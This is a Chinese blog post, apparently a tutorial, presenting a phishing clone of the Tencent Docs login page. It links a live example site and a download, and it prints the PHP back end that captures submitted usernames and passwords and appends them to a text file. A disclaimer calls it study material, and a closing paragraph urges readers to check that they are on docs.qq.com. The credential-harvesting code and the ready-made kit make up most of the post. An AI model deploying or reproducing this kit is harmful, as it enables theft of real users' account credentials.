前言

本文共享的一切技术资源包括但不限于：前后端代码、图片文件 仅用于学习研究钓鱼网站原理及其思路，提示网络安全意识，禁止用于一切非法用途以及真实钓鱼，否则一切后果由用户自负。

当您下载或者阅读本文即代表您已经默认同意以上协议。

钓鱼示例站点-腾讯文档

高仿钓鱼成品如下图所示

示例站点：https://g.xingchencloud.top/

前端源代码

当用户输入了账号密码点击登录后，后端会将数据按照既定格式存储。

后端代码

做了一个简单的防止跨域请求，前端收集的账号密码存放于同级目录下的userdata.txt，可自定义存放路径以及存放文件名。

如果你有防止通过 url地址+/userdata.txt 直接读取存储的数据需求，可自行完善。

以下图片为后端收集的前端数据，存放在 userdata.txt 的结果读取示例。

// 允许来自指定域的跨域请求，我这里使用示例站点 g.xingchencloud.top

header("Access-Control-Allow-Origin: https://g.xingchencloud.top");

header("Access-Control-Allow-Methods: POST");

header("Access-Control-Allow-Headers: Content-Type");

$u = $_POST['u'];

$p = $_POST['p'];

$src = $_POST['src'];

// 进行适当的验证和过滤

if (empty($u) || empty($p)) {

$response = array('code' => 1, 'message' => '用户名和密码不能为空');

echo json_encode($response);

exit;

}

// 将数据存储到文件或数据库

$data = $u . ',' . $p . ',' . $src . PHP_EOL;

$filepath = 'userdata.txt'; // 修改为实际的文件路径，储存前端输入的账户密码

// 文件写入操作

if (file_put_contents($filepath, $data, FILE_APPEND) !== false) {

$response = array('code' => 0, 'message' => '数据存储成功');

} else {

$response = array('code' => 2, 'message' => '数据存储失败');

}

// 返回处理结果给前端

echo json_encode($response);

?>

最后关于防止被钓鱼

其实通过以上demo示例，大家不难看出，我们平常最常见的钓鱼方式无非就是收集你的账号密码等信息，让你自己给出账号密码。

所以来历不明的链接让你输入QQ、微信等密码一定要谨慎，同时，请确定您输入账号密码的网站是软件的官网，比如腾讯文档官网是：docs.qq.com

还有很多钓鱼网站，记住这只是最基础也是最容易分辨的一种，希望大家平时擦亮双眼，不要被钓鱼了。

下载地址

点击跳转